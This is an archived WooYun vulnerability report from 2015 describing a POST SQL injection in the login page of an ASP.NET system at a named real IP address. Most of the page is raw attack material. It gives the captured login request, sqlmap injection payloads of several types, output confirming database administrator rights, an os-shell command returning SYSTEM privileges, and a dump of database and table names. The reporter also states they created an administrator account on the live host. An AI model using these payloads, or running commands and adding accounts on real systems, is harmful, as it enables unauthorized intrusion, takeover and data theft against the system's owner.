乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-06-23: 细节已通知厂商并且等待厂商处理中 2015-06-28: 厂商已经主动忽略漏洞,细节向公众公开
**
地址:http://218.108.255.183/UserLogin/Login.aspxPOST注入登录抓包:
POST /UserLogin/Login.aspx HTTP/1.1Host: 218.108.255.183Proxy-Connection: keep-aliveContent-Length: 204Cache-Control: max-age=0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Origin: http://218.108.255.183User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.153 Safari/537.36 SE 2.X MetaSr 1.0Content-Type: application/x-www-form-urlencodedReferer: http://218.108.255.183/UserLogin/Login.aspxAccept-Encoding: gzip,deflate,sdchAccept-Language: zh-CN,zh;q=0.8Cookie: ASP.NET_SessionId=hfivawitao0pgzzcqewfst45; JSESSIONID=1wx3gyfq326t51xahj4mziimtt; ems.userName=admin; ems.rememberName=true__VIEWSTATE=%2FwEPDwUKLTIzMzMxOTU2NGRkRqk7KLeK6wUAcopjoFw%2BBISbkwo%3D&__EVENTVALIDATION=%2FwEWBAKHhpR8Au3yj58JAvfEm%2BEEAtqbqrEJS1XjZbZoLWoT5u6guLSYPuMyBC0%3D&hidSubmit=Login&txt_UserName=aaa&txt_Pwd=aaa
POST注入,DBA权限:
sts:---Place: POSTParameter: txt_UserName Type: error-based Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause Payload: __VIEWSTATE=/wEPDwUKLTIzMzMxOTU2NGRkRqk7KLeK6wUAcopjoFw BISbkwo=&__EVENTVALIDATION=/wEWBAKHhpR8Au3yj58JAvfEm EEAtqbqrEJS1XjZbZoLWoT5u6guLSYPuMyBC0=&hidSubmit=Login&txt_UserName=aaa' AND 5524=CONVERT(INT,(CHAR(58) CHAR(105) CHAR(102) CHAR(116) CHAR(58) (SELECT (CASE WHEN (5524=5524) THEN CHAR(49) ELSE CHAR(48) END)) CHAR(58) CHAR(105) CHAR(104) CHAR(111) CHAR(58))) AND 'gqgC'='gqgC&txt_Pwd=aaa Type: UNION query Title: Generic UNION query (NULL) - 6 columns Payload: __VIEWSTATE=/wEPDwUKLTIzMzMxOTU2NGRkRqk7KLeK6wUAcopjoFw BISbkwo=&__EVENTVALIDATION=/wEWBAKHhpR8Au3yj58JAvfEm EEAtqbqrEJS1XjZbZoLWoT5u6guLSYPuMyBC0=&hidSubmit=Login&txt_UserName=-6445' UNION ALL SELECT NULL,NULL,CHAR(58) CHAR(105) CHAR(102) CHAR(116) CHAR(58) CHAR(98) CHAR(108) CHAR(72) CHAR(108) CHAR(65) CHAR(104) CHAR(100) CHAR(110) CHAR(81) CHAR(79) CHAR(58) CHAR(105) CHAR(104) CHAR(111) CHAR(58),NULL,NULL,NULL-- &txt_Pwd=aaa Type: stacked queries Title: Microsoft SQL Server/Sybase stacked queries Payload: __VIEWSTATE=/wEPDwUKLTIzMzMxOTU2NGRkRqk7KLeK6wUAcopjoFw BISbkwo=&__EVENTVALIDATION=/wEWBAKHhpR8Au3yj58JAvfEm EEAtqbqrEJS1XjZbZoLWoT5u6guLSYPuMyBC0=&hidSubmit=Login&txt_UserName=aaa'; WAITFOR DELAY '0:0:5'--&txt_Pwd=aaa Type: AND/OR time-based blind Title: Microsoft SQL Server/Sybase time-based blind Payload: __VIEWSTATE=/wEPDwUKLTIzMzMxOTU2NGRkRqk7KLeK6wUAcopjoFw BISbkwo=&__EVENTVALIDATION=/wEWBAKHhpR8Au3yj58JAvfEm EEAtqbqrEJS1XjZbZoLWoT5u6guLSYPuMyBC0=&hidSubmit=Login&txt_UserName=aaa' WAITFOR DELAY '0:0:5'--&txt_Pwd=aaa---[16:04:03] [INFO] the back-end DBMS is Microsoft SQL Serverweb server operating system: Windows 2003web application technology: ASP.NET, Microsoft IIS 6.0, ASP.NET 2.0.50727back-end DBMS: Microsoft SQL Server 2005[16:04:03] [INFO] testing if current user is DBAcurrent user is DBA: True[16:04:03] [WARNING] HTTP error codes detected during run:500 (Internal Server Error) - 1 times[16:04:03] [INFO] fetched data logged to text files under 'D:\Python27\sqlmap\output\218.108.255.183'[*] shutting down at 16:04:03
DBA可以直接执行CMD命令:
os-shell> whoamido you want to retrieve the command standard output? [Y/n/a] y[16:11:59] [INFO] the SQL query used returns 1 entries[16:12:00] [INFO] retrieved: "nt authority\\\\system"command standard output [1]:[*] nt authority\systemos-shell>
可以添加管理账户,我添加了个wooyun/test123列下数据库:
available databases [7]:[*] master[*] model[*] msdb[*] RMSS[*] RMSS20140825[*] RMSS_TEST[*] tempdb
表名:
Database: RMSS[247 tables]+-------------------------------+| 1111111 || AssemblyAddress_List || AssemblyPortSource_Details || AssemblyPortSource_Details_Mb || AssemblyPortSource_Master || Assembly_Details || Assembly_List || CMTS || Cabinet_Info || ClientTypeA || ClientTypeALocal || Client_Info || Equipment_AdrDistribute || Equipment_Borrow || Equipment_Info || Equipment_Resource || Exit_LinkLayer || F_sjzd || Ggglll_Info || Ggjf_GggL_List || Ggjf_GggL_details || Ggjf_Jfsgd_List || Ggjf_Jfsgd_details || Gz_pb || Gz_pbgl || Gzcl_Gzbg || Gzcl_Gzcc || Gzcl_Gzlx || Gzcl_Gzly || Gzcl_Gzpg || Gzcl_Gztzsj || Gzgl_GzdjSet || Gzgl_Gzzy || Gzl_Cszy || Gzl_Gjsq || Gzl_Gjsq_wj || Gzl_Glzy || Gzl_Gzts || Gzl_Gzts_Cllc || Gzl_Gzts_CsNote || Gzl_Gzts_Gzzt || Gzl_IPwgzy || Gzl_Jfsg || Gzl_Jfzy || Gzl_Lcqd || Gzl_Xtbg || Gzl_xtbg_hcysz || Gztz_Cstz || GzzjDetail || GzzjMaster || IP_Bussiness || IP_Bussiness_Restore || IP_Distribute || IP_Explorer || IP_Free_Info || IP_Restore_Info || IP_Source_Master || IP_VPN_Distribute || JG_Resource || Jkgl_JkSb || Jkgl_Jkd || Jkgl_Khzy || Jkgl_Ywpz || Jkgl_Ywpz_gl || Jrlx_List || Keep_Watch_Group || Kh_Update_Log || Ly_Ht || Ly_Lyxx || Ly_Wygs || MachineRoom || MyGroups || MyGroups_Items || MyWork_NewPbgl || NDTV_Equipment || Numeral_TV || OA_Files || OA_Info || OA_tx || ONU_Dk || ONU_Dk_Mb || PVCID || PVCID_Distribute || RoleGroup || RoleItems || SMS_History || SMS_LOG || SMS_NotePad || SMS_Phrase || SMS_Team || SMS_TempPhone || SYS_Calendar || SYS_Calendar_Item || SYS_CurrUserList || SYS_FILE || SYS_GROUPS || SYS_Image || SYS_Lcsq || SYS_Lcsq_Gly || SYS_Lcsq_Glyqx || SYS_Log || SYS_MsgTable || SYS_PKeyInfo || SYS_RULES || SYS_TABLE || SYS_TABLE_FIELD || SYS_TaxClient || SYS_USERS || SYS_WFCAT || SYS_WFS || SYS_WFS_Controls || SYS_WFS_LINKS || SYS_WFS_Nodes || SYS_WFS_TABLES || SYS_WFS_UNITS || SYS_WFS_USERS || SYS_WF_Cscd || SYS_WF_MAIL_SMS || SYS_WF_PRCLNKS || SYS_WF_PRCS || SYS_WF_SHARE || SYS_WF_State || SYS_WF_State_Folder || SYS_WF_TASKS || SYS_WF_Task_Master || SYS_WF_Url || SbIpzygl || Signature || Spur_Track_Info || Sys_Mlcsq || Sys_Values || Sys_Wfs_Add || TCP_TOR || TS_ZD || TS_ZD_Info || T_Gw_User || T_User || T_User_Gwmc || T_dzxxgh || T_dzztgh || T_vlan || TaskDetail || TaskMaster || TaskPrivilege || Te_UserSelect || Transfers_Details || Transfers_Info || Ts_DataBackup || Ts_DataType || Ts_Dep_menu || Ts_E_Dep_menu || Ts_Gllx || Ts_Kh1 || Ts_Logs || Ts_UserRight || Ts_fz || Ts_onLineUser || Ts_sys_menu || Ts_userGroup || Ts_userGroupRight || Ts_userGroup_info || VPN_Resource || V_GsbDk || Vlan_Distribute || Vlan_Restore || Watch_Info || DataBase || assmblyportsource_master_bz || bs_code || ckll_backup || config || device || dtproperties || fav_dir || fav_link || file_temp || frjfb || frjrjft || ggjfjrsb || ip_bussiness1 || ip_store || ip_store_23 || ip_store_orign || kb_Files || kb_Files_Attachments || kb_Folders || kb_FoldersFiles || kb_Folders_AttachmentUser || kb_Folders_Privilege || kb_Privilege_Templates || kb_ProjectDocument || kb_files_Comment || kb_files_Reader || kb_files_Recommend || msn_dysw || msn_gongzuo || mylcsq || mylcsq_prcs || news || newsAnnex || play_evolutions || ref || ref_ip || selfuseing_ip || sqlmapoutput || sys_dwzt || sysdiagrams || t || temp_mylc || temp_mywork || tmp_ipbussinessid || todete || ts_GroupFzzjRight || ts_GroupHyRight || ts_GroupQyRight || ts_HyRight || ts_QyRight || ts_fzzg_right || ts_kh || ts_kh_ORA || ts_kh_restore || ts_kh_tmp || v_Kh_Lx || v_Kh_Rank || v_UserInfo || v_wt_all || vlan_temp1 || vlan_temp2 || voip_ip_store || vw_DepGzzj || vw_DepTask || vw_GggL_List || vw_PersonGzzj || vw_PersonTask || vw_gztj || vw_hotArticle || vw_iP_Restore_Info || vw_ip_distribute || vw_ip_free || vw_ip_source_master || vw_kb_FilesProjects || vw_newArticle || vw_recommandArticle || vw_sbly_List || vw_zww_IP_Restore_Info || vw_zww_ip_distribute || vw_zww_ip_source_master |+-------------------------------+
RT
危害等级:无影响厂商忽略
忽略时间:2015-06-28 15:50
漏洞Rank:4 (WooYun评价)
暂无